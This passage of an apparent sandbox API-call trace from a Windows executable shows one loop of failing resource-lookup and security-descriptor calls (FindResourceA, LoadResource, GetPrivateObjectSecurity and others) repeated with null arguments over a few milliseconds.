(hResData=0x0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource (hResData=0x0) returned 0 [0070.074] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.074] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.074] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource (hResData=0x0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.074] LockResource (hResData=0x0) returned 0x0 [0070.074] FreeResource (hResData=0x0) returned 0 [0070.074] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.074] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.074] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.074] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.074] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.075] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.075] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.075] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.075] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.075] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.075] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.075] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.075] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.075] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.075] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.075] LockResource (hResData=0x0) returned 0x0 [0070.075] FreeResource (hResData=0x0) returned 0 [0070.076] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.076] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.076] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.076] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.076] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.076] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.076] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.076] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.076] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.076] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.076] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.076] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.076] LockResource (hResData=0x0) returned 0x0 [0070.076] FreeResource (hResData=0x0) returned 0 [0070.076] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.077] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.077] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.077] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.077] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.077] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.077] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.077] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.077] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.077] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.077] LockResource (hResData=0x0) returned 0x0 [0070.077] FreeResource (hResData=0x0) returned 0 [0070.077] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.077] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.077] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.078] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.078] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.078] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.078] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.078] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.078] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.078] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.078] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.078] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.078] LockResource (hResData=0x0) returned 0x0 [0070.078] FreeResource (hResData=0x0) returned 0 [0070.078] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.079] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.079] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.079] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.079] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.079] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.079] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.079] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.079] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.079] LockResource (hResData=0x0) returned 0x0 [0070.079] FreeResource (hResData=0x0) returned 0 [0070.079] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.079] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.079] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.079] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.079] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.080] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.080] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.080] LoadResource 